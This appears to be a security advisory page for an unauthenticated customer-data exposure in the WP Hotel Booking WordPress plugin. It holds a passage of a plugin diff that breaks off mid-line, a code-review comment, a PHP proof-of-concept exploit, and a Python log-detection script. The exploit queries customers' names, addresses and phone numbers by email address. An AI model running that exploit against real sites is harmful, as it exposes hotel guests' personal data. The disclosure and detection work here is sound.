+			'check_in_date'     => hb_get_request( 'check_in_date' ),
+			'check_out_date'    => hb_get_request( 'check_out_date' ),
+			'hb_check_in_date'  => hb_get_request( 'hb_check_in_date' ),
+			'hb_check_out_date' => hb_get_request( 'hb_check_out_date' ),
+			'adults'            => hb_get_request( 'adults_capacity' ),
+			'max_child'         => hb_get_request( 'max_child' ),
+		);
+
+		$return = apply_filters(
+			'hotel_booking_parse_search_param',
+			array(
+				'success' => 1,
+				'sig'     => base64_encode( wp_json_encode( $params ) ),
+				'params'  => $params,
+			)
+		);
+		hb_send_json( $return );
+	}
+
+	static function apply_coupon() {
+		! session_id() && session_start( array( 'read_and_close' => true ) );
+		$code = hb_get_request( 'code' );
+		if ( empty( hb_get_request( 'nonce', false ) )
+			|| ! wp_verify_nonce( hb_get_request( 'nonce' ), 'hb_booking_nonce_action' ) ) {
+			wp_die( __( 'Require Nonce!', 'wp-hotel-booking' ) );
+		}
+		ob_start();
+		$today  = strtotime( date( 'm/d/Y' ) );
+		$coupon = hb_get_coupons_active( $today, $code );
+
+		$output   = ob_get_clean();
+		$response = array();
+		if ( $coupon ) {
+			$coupon   = HB_Coupon::instance( $coupon );
+			$response = $coupon->validate();
+			if ( $response['is_valid'] ) {
+				$response['result'] = 'success';
+				$response['type']   = get_post_meta( $coupon->ID, '_hb_coupon_discount_type', true );
+				$response['value']  = get_post_meta( $coupon->ID, '_hb_coupon_discount_value', true );
+				// set session
+				WP_Hotel_Booking::instance()->cart->set_customer( 'coupon', $coupon->post->ID );
+				hb_add_message( __( 'Coupon code applied', 'wp-hotel-booking' ) );
+			}
+		} else {
+			$response['message'] = __( 'Coupon does not exist!', 'wp-hotel-booking' );
+		}
+		hb_send_json(
+			$response
+		);
+	}
+
+	static function remove_coupon() {
+		! session_id() && session_start( array( 'read_and_close' => true ) );
+		// delete_transient( 'hb_user_coupon_' . session_id() );
+		WP_Hotel_Booking::instance()->cart->set_customer( 'coupon', null );
+		hb_add_message( __( 'Coupon code removed', 'wp-hotel-booking' ) );
+		hb_send_json(
+			array(
+				'result' => 'success',
+			)
+		);
+	}
+
+	static function parse_booking_params() {
+
+		check_ajax_referer( 'hb_booking_nonce_action', 'nonce' );
+
+		$check_in     = hb_get_request( 'check_in_date' );
+		$check_out    = hb_get_request( 'check_out_date' );
+		$num_of_rooms = hb_get_request( 'hb-num-of-rooms' );
+
+		$params = array(
+			'hotel-booking'   => hb_get_request( 'hotel-booking' ),
+			'check_in_date'   => $check_in,
+			'check_out_date'  => $check_out,
+			'hb-num-of-rooms' => $num_of_rooms,
+		);
+
+		// print_r($params);
+		hb_send_json(
+			array(
+				'success' => 1,
+				'sig'     => base64_encode( serialize( $params ) ),
+			)
+		);
+	}
+
+	static function ajax_add_to_cart() {
+		$res = new WPHB_REST_Response();
+
+		try {
+			if ( ! check_ajax_referer( 'hb_booking_nonce_action', 'nonce' ) ) {
+				throw new Exception( __( 'Invalid request', 'wp-hotel-booking' ) );
+			}
+
+			$qty            = WPHB_Helpers::get_param( 'hb-num-of-rooms', 1, 'int' );
+			$room_id        = WPHB_Helpers::get_param( 'room-id', 0, 'int' );
+			$check_in_
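Review bot: In the new `fetch_customer_info()` (the `@deprecated 2.2.8` block), everything after `_deprecated_function( __METHOD__, '2.2.8' ); die();` is unreachable: the `check_ajax_referer( 'wphb_get_customer_info' )`, the `get_posts()` lookup of `hb_booking` by `_hb_customer_email`, and the loop that copies every post-meta value into `$customer->data` never run, yet the code that returns a booking's full metadata for any supplied email stays in the file. Delete the body rather than shadowing it with `die()`, and delete the commented-out `//'fetch_customer_info' => true,` entry in `$ajax_actions` instead of leaving a `wp_ajax_nopriv_` registration one uncommented line away from re-exposing a handler that still has no `current_user_can()` check. The same nonce-only gate remains on the other `nopriv` action that changes state, `dismiss_notice`, which writes `wphb_notice_remove_hotel_booking` after verifying only the `hb_booking_nonce_action` nonce; a `current_user_can( 'manage_options' )` check there would close that path as well.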

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14075 - WP Hotel Booking <= 2.2.7 - Unauthenticated Sensitive Information Exposure via 'email' Parameter

$target_url = 'https://example.com/wp-admin/admin-ajax.php';

// Step 1: obtain a valid nonce from a public page.
// The plugin generates nonces for the action 'hb_booking_nonce_action';
// these are typically embedded in booking/search pages served to anyone.
$nonce = 'REPLACE_WITH_VALID_NONCE';

// Step 2: target email address to query
$email = 'victim@example.com';

// Step 3: request parameters for the wp_ajax_nopriv_ handler
$post_data = array(
    'action' => 'hotel_booking_fetch_customer_info',
    'email'  => $email,
    'nonce'  => $nonce,
);

// Step 4: send the request. No cookies are sent: the handler is reachable
// without a WordPress session, which is the vulnerability.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Certificate checks are disabled only for lab targets with self-signed certificates.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response  = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if ($response === false) {
    echo "[-] cURL error: " . curl_error($ch) . "\n";
    curl_close($ch);
    exit(1);
}
curl_close($ch);

// Step 5: parse and display results. The handler returns the booking post's
// customer meta fields (the _hb_customer_* keys) as JSON.
$fields = array(
    'Email'       => '_hb_customer_email',
    'First Name'  => '_hb_customer_first_name',
    'Last Name'   => '_hb_customer_last_name',
    'Address'     => '_hb_customer_address',
    'City'        => '_hb_customer_city',
    'State'       => '_hb_customer_state',
    'Postal Code' => '_hb_customer_postal_code',
    'Country'     => '_hb_customer_country',
    'Phone'       => '_hb_customer_phone',
);

if ($http_code == 200) {
    $data = json_decode($response, true);
    if (is_array($data) && !empty($data)) {
        echo "[+] SUCCESS: Customer data retrieved:\n";
        echo "Customer ID: " . ($data['ID'] ?? 'N/A') . "\n";
        foreach ($fields as $label => $key) {
            echo "$label: " . ($data['data'][$key] ?? 'N/A') . "\n";
        }
    } else {
        echo "[-] No customer data found for email: $email\n";
        echo "Raw response: $response\n";
    }
} else {
    echo "[-] Request failed with HTTP code: $http_code\n";
    echo "Response: $response\n";
}
?>
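The request shape in the PoC above (a POST to admin-ajax.php carrying action=hotel_booking_fetch_customer_info, an email and a nonce, with no WordPress session cookie) is also what a defender should hunt for in traffic captured before the 2.2.8 update. The following Python is an added detection example written for this page, not Atomic Edge's or the plugin's code. It assumes a hypothetical reverse-proxy or WAF request log with one JSON object per line that records the POST body and the Cookie header (ordinary web server access logs do not log bodies, so this needs a proxy or WAF that does); the log lines are constructed, and the session test is a heuristic on cookie presence, not cookie validity. It flags each unauthenticated call to the action and reports sources that queried several distinct email addresses, the enumeration pattern the unauthenticated handler enables.

```python
import json
from collections import defaultdict
from urllib.parse import parse_qs

# AJAX action that WP Hotel Booking registers under wp_ajax_nopriv_ (from the advisory).
TARGET_ACTION = "hotel_booking_fetch_customer_info"

# Constructed sample request log (hypothetical format: one JSON object per line
# carrying the raw POST body and the Cookie header). Not real traffic; the IPs
# are documentation ranges and the nonce value is made up.
SAMPLE_LOG = """\
{"ts":"2026-01-20T10:00:01Z","src":"203.0.113.7","method":"POST","path":"/wp-admin/admin-ajax.php","body":"action=hotel_booking_fetch_customer_info&email=a%40example.com&nonce=9f1c2e3d4b","cookies":""}
{"ts":"2026-01-20T10:00:02Z","src":"203.0.113.7","method":"POST","path":"/wp-admin/admin-ajax.php","body":"action=hotel_booking_fetch_customer_info&email=b%40example.com&nonce=9f1c2e3d4b","cookies":""}
{"ts":"2026-01-20T10:00:03Z","src":"203.0.113.7","method":"POST","path":"/wp-admin/admin-ajax.php","body":"action=hotel_booking_fetch_customer_info&email=c%40example.com&nonce=9f1c2e3d4b","cookies":""}
{"ts":"2026-01-20T10:05:00Z","src":"198.51.100.4","method":"POST","path":"/wp-admin/admin-ajax.php","body":"action=hotel_booking_fetch_customer_info&email=staff%40example.com&nonce=9f1c2e3d4b","cookies":"wordpress_logged_in_abc=admin%7C...; wp-settings-1=x"}
{"ts":"2026-01-20T10:06:00Z","src":"198.51.100.9","method":"POST","path":"/wp-admin/admin-ajax.php","body":"action=some_other_action&room-id=12&nonce=9f1c2e3d4b","cookies":""}
{"ts":"2026-01-20T10:07:00Z","src":"203.0.113.7","method":"GET","path":"/rooms/","body":"","cookies":""}
"""


def parse_event(line: str) -> dict:
    """Decode one log line and split its form-encoded body into a params dict."""
    rec = json.loads(line)
    body = parse_qs(rec.get("body", ""), keep_blank_values=True)
    rec["params"] = {k: v[0] for k, v in body.items()}
    return rec


def has_wp_session(cookie_header: str) -> bool:
    """Heuristic: a wordpress_logged_in_* cookie is present (not validated)."""
    for part in cookie_header.split(";"):
        if part.strip().startswith("wordpress_logged_in_"):
            return True
    return False


def is_unauth_customer_fetch(rec: dict) -> bool:
    """The exploit shape: POST to admin-ajax.php, target action, no session cookie."""
    return (
        rec.get("method") == "POST"
        and rec.get("path", "").endswith("/wp-admin/admin-ajax.php")
        and rec["params"].get("action") == TARGET_ACTION
        and not has_wp_session(rec.get("cookies", ""))
    )


def analyze(log_text: str, enum_threshold: int = 3):
    """Return (hits, enumerators): every unauthenticated customer-info fetch, and
    the sources that queried at least enum_threshold distinct email addresses."""
    hits = []
    emails_by_src = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_event(line)
        if is_unauth_customer_fetch(rec):
            hits.append(rec)
            emails_by_src[rec["src"]].add(rec["params"].get("email", ""))
    enumerators = {
        src: sorted(emails)
        for src, emails in emails_by_src.items()
        if len(emails) >= enum_threshold
    }
    return hits, enumerators


if __name__ == "__main__":
    found, enum_sources = analyze(SAMPLE_LOG)
    for h in found:
        print(f"{h['ts']} {h['src']} unauthenticated {TARGET_ACTION} "
              f"email={h['params'].get('email')}")
    for src, emails in enum_sources.items():
        print(f"ENUMERATION {src}: {len(emails)} distinct emails ({', '.join(emails)})")
```

Run against the constructed log, the three requests from 203.0.113.7 are flagged and that source is reported as an enumerator, while the logged-in request from 198.51.100.4 and the unrelated action are ignored. After updating to 2.2.8 the capability check makes these requests fail, but the same query over retained logs tells you whether the endpoint was abused while the site was still on 2.2.7, which is what a breach assessment needs.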
